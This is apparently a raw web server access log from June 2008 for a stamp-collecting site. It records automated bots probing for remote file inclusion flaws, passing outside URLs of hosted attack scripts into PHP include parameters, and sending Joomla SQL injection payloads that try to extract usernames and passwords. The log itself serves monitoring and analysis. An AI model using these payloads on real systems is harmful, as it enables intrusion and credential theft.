216.167.156.20 - - [08/Jun/2008:20:14:36 -0700] "GET /logs/access_080512.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:14:43 -0700] "GET /logs/access_080519.log/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:20:14:43 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:14:44 -0700] "GET /logs/access_080519.log/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:14:44 -0700] "GET /scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:14:44 -0700] "GET /scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:20:14:44 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:14:44 -0700] "GET /logs/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:14:45 -0700] "GET /logs/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:14:45 -0700] "GET /logs/access_080512.log/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:14:45 -0700] "GET /logs/access_080512.log/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:20:14:50 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:14:59 -0700] "GET /logs/access_080519.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:14:59 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:14:59 -0700] "GET /logs/access_080512.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:15:09 -0700] "GET /logs/access_080519.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:15:09 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:15:09 -0700] "GET /logs/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:15:09 -0700] "GET /logs/access_080512.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:15:17 -0700] "GET /logs/access_080519.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:15:17 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:15:17 -0700] "GET /logs/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:15:18 -0700] "GET /logs/access_080512.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:20:15:24 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
189.129.32.158 - - [08/Jun/2008:20:17:54 -0700] "GET /logs/access.log/index.php?pagina=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:22:16 -0700] "GET /scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:22:16 -0700] "GET /scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:24:20 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:24:20 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:24:27 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.200.71.234 - - [08/Jun/2008:20:24:32 -0700] "GET /logs/access_080512.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.71.234 - - [08/Jun/2008:20:24:32 -0700] "GET /logs/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:24:46 -0700] "GET /logs/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:24:46 -0700] "GET /logs/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:24:46 -0700] "GET /scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [08/Jun/2008:20:24:47 -0700] "GET /scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:24:48 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:25:34 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.53.196.178 - - [08/Jun/2008:20:25:38 -0700] "GET //phpAds/view.inc.php?phpAds_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
74.53.196.178 - - [08/Jun/2008:20:25:38 -0700] "GET /logs//phpAds/view.inc.php?phpAds_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
62.140.73.234 - - [08/Jun/2008:20:29:53 -0700] "GET //phpAds/view.inc.php?phpAds_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
62.140.73.234 - - [08/Jun/2008:20:29:53 -0700] "GET /logs//phpAds/view.inc.php?phpAds_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
74.53.196.178 - - [08/Jun/2008:20:32:47 -0700] "GET //ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
74.53.196.178 - - [08/Jun/2008:20:32:47 -0700] "GET /logs//ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
74.6.17.177 - - [08/Jun/2008:20:33:46 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
64.15.129.23 - - [08/Jun/2008:20:35:46 -0700] "GET //phpAds/view.inc.php?phpAds_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.mathstamps.com"
64.15.129.23 - - [08/Jun/2008:20:35:47 -0700] "GET /logs//phpAds/view.inc.php?phpAds_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.mathstamps.com"
62.140.73.234 - - [08/Jun/2008:20:35:50 -0700] "GET /logs//ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
62.140.73.234 - - [08/Jun/2008:20:35:50 -0700] "GET //ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
64.15.129.23 - - [08/Jun/2008:20:36:40 -0700] "GET /logs//ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
64.15.129.23 - - [08/Jun/2008:20:36:42 -0700] "GET //ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
66.135.34.76 - - [08/Jun/2008:20:38:04 -0700] "GET //phpAds/view.inc.php?phpAds_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.mathstamps.com"
66.135.34.76 - - [08/Jun/2008:20:38:04 -0700] "GET /logs//phpAds/view.inc.php?phpAds_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.mathstamps.com"
66.135.34.76 - - [08/Jun/2008:20:39:12 -0700] "GET //ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.mathstamps.com"
66.135.34.76 - - [08/Jun/2008:20:39:12 -0700] "GET /logs//ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.mathstamps.com"
216.127.70.91 - - [08/Jun/2008:20:43:05 -0700] "GET /logs////////?mosConfig_absolute_path=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 200 7813 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.127.70.91 - - [08/Jun/2008:20:43:11 -0700] "GET ////////?mosConfig_absolute_path=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 200 785 "-" "libwww-perl/5.79" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:43:32 -0700] "GET /logs/access_080414.log/default.php?page=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:43:32 -0700] "GET /default.php?page=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:43:32 -0700] "GET /logs/default.php?page=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:43:39 -0700] "GET /logs/access_080414.log/default.php?page=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:43:39 -0700] "GET /default.php?page=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:43:40 -0700] "GET /logs/default.php?page=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:44:31 -0700] "GET /logs/access_080428.log/default.php?page=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:44:32 -0700] "GET /logs/access_080428.log/default.php?page=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
74.53.196.178 - - [08/Jun/2008:20:47:26 -0700] "GET /logs/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
74.53.196.178 - - [08/Jun/2008:20:47:26 -0700] "GET /modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
61.19.242.160 - - [08/Jun/2008:20:47:34 -0700] "GET /logs/access_080519.log/index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
61.19.242.160 - - [08/Jun/2008:20:47:35 -0700] "GET /logs/access.log/index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
61.19.242.160 - - [08/Jun/2008:20:47:35 -0700] "GET /index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
61.19.242.160 - - [08/Jun/2008:20:47:35 -0700] "GET /logs/index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.15.129.23 - - [08/Jun/2008:20:47:35 -0700] "GET /modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
64.15.129.23 - - [08/Jun/2008:20:47:38 -0700] "GET /logs/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
66.135.34.76 - - [08/Jun/2008:20:48:19 -0700] "GET /modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.mathstamps.com"
66.135.34.76 - - [08/Jun/2008:20:48:19 -0700] "GET /logs/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.mathstamps.com"
62.140.73.234 - - [08/Jun/2008:20:48:26 -0700] "GET /logs/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
62.140.73.234 - - [08/Jun/2008:20:48:26 -0700] "GET /modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:54:01 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:54:02 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:54:02 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
70.86.5.10 - - [08/Jun/2008:20:56:57 -0700] "GET /admin/inc/change_action.php?format_menue=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.mathstamps.com"
70.86.5.10 - - [08/Jun/2008:20:56:58 -0700] "GET /logs/admin/inc/change_action.php?format_menue=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:58:07 -0700] "GET /logs/access_080512.log//skin/zero_vote/error.php?dir=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:58:07 -0700] "GET //skin/zero_vote/error.php?dir=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:20:58:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:21:00:06 -0700] "GET /logs/access_080428.log//skin/zero_vote/error.php?dir=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
193.26.1.33 - - [08/Jun/2008:21:01:44 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:21:01:52 -0700] "GET /logs/access_080428.log/index2.php?DoAction=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:21:01:52 -0700] "GET /index2.php?DoAction=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:21:01:53 -0700] "GET /logs/index2.php?DoAction=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:21:02:03 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:21:02:03 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:21:02:04 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:21:02:11 -0700] "GET /logs/access_080407.log/index2.php?DoAction=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
210.48.67.39 - - [08/Jun/2008:21:03:22 -0700] "GET /logs/access_080519.log//joomla/index.php?option=com_restaurante&task=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.48.67.39 - - [08/Jun/2008:21:03:22 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.48.67.39 - - [08/Jun/2008:21:03:23 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.48.67.39 - - [08/Jun/2008:21:03:37 -0700] "GET /logs/access_080421.log//joomla/index.php?option=com_restaurante&task=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.173.115 - - [08/Jun/2008:21:03:54 -0700] "GET /logs/access_080519.log//joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.173.115 - - [08/Jun/2008:21:03:54 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.173.115 - - [08/Jun/2008:21:03:55 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.173.115 - - [08/Jun/2008:21:04:08 -0700] "GET /logs/access_080421.log//joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.48.67.39 - - [08/Jun/2008:21:04:54 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.48.67.39 - - [08/Jun/2008:21:04:54 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.48.67.39 - - [08/Jun/2008:21:05:12 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.48.67.39 - - [08/Jun/2008:21:05:13 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.48.67.39 - - [08/Jun/2008:21:05:13 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.17.177 - - [08/Jun/2008:21:06:07 -0700] "GET /logs/?S=A HTTP/1.0" 200 7786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
89.111.173.115 - - [08/Jun/2008:21:06:11 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.173.115 - - [08/Jun/2008:21:06:11 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.58.181.74 - - [08/Jun/2008:21:06:33 -0700] "GET /logs/access_080519.log//joomla/index.php?option=com_restaurante&task=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.181.74 - - [08/Jun/2008:21:06:33 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.181.74 - - [08/Jun/2008:21:06:34 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.181.74 - - [08/Jun/2008:21:06:38 -0700] "GET /logs/access_080421.log//joomla/index.php?option=com_restaurante&task=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
